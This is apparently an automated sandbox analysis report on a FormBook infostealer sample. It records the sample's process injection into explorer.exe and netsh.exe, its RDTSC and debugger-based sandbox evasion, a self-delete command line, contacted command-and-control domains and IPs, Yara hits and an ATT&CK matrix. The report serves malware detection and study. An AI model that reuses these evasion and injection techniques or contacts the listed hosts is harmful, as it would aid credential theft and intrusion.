          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041F007
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00401208
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041DC7B
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041ED47
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00402D88
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00409E5C
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041EE6F
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041D6F5
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041DFEF
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BDAA0A
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BCC520
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BC3540
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BC8ED0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: String function: 00BCD960 appears 64 times
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: String function: 00BD25D4 appears 36 times
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A360 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A410 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A490 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A35A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A40A NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041A48C NtClose,
          Source: 2022-571-GLS.exeReversingLabs: Detection: 30%
          Source: C:\Users\user\Desktop\2022-571-GLS.exeFile read: C:\Users\user\Desktop\2022-571-GLS.exeJump to behavior
          Source: 2022-571-GLS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2022-571-GLS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\2022-571-GLS.exe C:\Users\user\Desktop\2022-571-GLS.exe
          Source: C:\Users\user\Desktop\2022-571-GLS.exeProcess created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeProcess created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\2022-571-GLS.exeProcess created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeProcess created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe"
          Source: C:\Users\user\Desktop\2022-571-GLS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\2022-571-GLS.exeFile created: C:\Users\user\AppData\Local\Temp\nst2735.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@3/3
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\2022-571-GLS.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --headless
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --unix
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --width
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --height
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --signal
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --server
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --headless
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --unix
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --width
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --height
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --signal
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --server
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: netsh.pdb source: jsqqecy.exe, 00000002.00000002.381171915.0000000001119000.00000004.00000020.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.383264606.0000000003200000.00000040.10000000.00040000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381214615.0000000001131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: jsqqecy.exe, 00000001.00000003.299119725.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000001.00000003.299523428.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000003.303967054.0000000001217000.00000004.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381584152.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.382622757.00000000014CF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.382550493.0000000003384000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.380856964.00000000031ED000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563303711.0000000003520000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563833806.000000000363F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: jsqqecy.exe, 00000002.00000002.381171915.0000000001119000.00000004.00000020.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.383264606.0000000003200000.00000040.10000000.00040000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381214615.0000000001131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: jsqqecy.exe, 00000001.00000003.299119725.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000001.00000003.299523428.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000003.303967054.0000000001217000.00000004.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381584152.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.382622757.00000000014CF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.382550493.0000000003384000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.380856964.00000000031ED000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563303711.0000000003520000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563833806.000000000363F000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD5A75 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041D05E push cs; ret
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041681D push 99159BFBh; iretd
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00417829 push esp; retf
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00416C89 push es; ret
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041D4B5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041D56C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041D502 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0041D50B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0040674B push esi; iretd
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD5A75 push ecx; ret
          Source: jsqqecy.exe.0.drStatic PE information: section name: .00cfg
          Source: jsqqecy.exe.0.drStatic PE information: section name: .voltbl
          Source: C:\Users\user\Desktop\2022-571-GLS.exeFile created: C:\Users\user\AppData\Local\Temp\jsqqecy.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE5
          Source: C:\Users\user\Desktop\2022-571-GLS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002939904 second address: 000000000293990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002939B7E second address: 0000000002939B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 3156Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\netsh.exe TID: 6032Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeAPI coverage: 2.2 %
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeAPI coverage: 2.2 %
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00402654 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD52F3 FindFirstFileExW,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD53A7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD52F3 FindFirstFileExW,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD53A7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\Desktop\2022-571-GLS.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000003.00000000.366063254.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000003.00000000.365236364.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.342989666.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000003.00000000.366769523.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.351146407.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000003.00000000.365236364.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD383A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD25EB GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD00FE mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD41ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD00FE mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD41ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCD780 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD383A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCDC8D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCD78C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD383A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BCDC8D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BCD78C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BCD780 SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.easyentry.vip
          Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.221.114.43 80
          Source: C:\Windows\explorer.exeDomain query: www.cdlcapitolsolutions.com
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.81.221 80
          Source: C:\Windows\explorer.exeDomain query: www.fulili.com
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\jsqqecy.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeThread register set: target process: 3528
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3528
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeProcess created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe"
          Source: explorer.exe, 00000003.00000000.358106625.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.339007760.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.306844469.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000003.00000000.348541007.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.363020980.0000000005C70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.358106625.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.358106625.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.339007760.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.306844469.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.338725850.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.306396985.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
          Source: explorer.exe, 00000003.00000000.358106625.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.339007760.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.306844469.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCD9A5 cpuid
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCD632 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Uses netsh to modify the Windows network and firewall settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter          		Path Interception412
          Process Injection          		1
          Rootkit          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		11
          Input Capture          		241
          Security Software Discovery          		Remote Desktop Protocol11
          Input Capture          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)412
          Process Injection          		NTDS2
          Process Discovery          		Distributed Component Object Model2
          Clipboard Data          		Scheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSync114
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
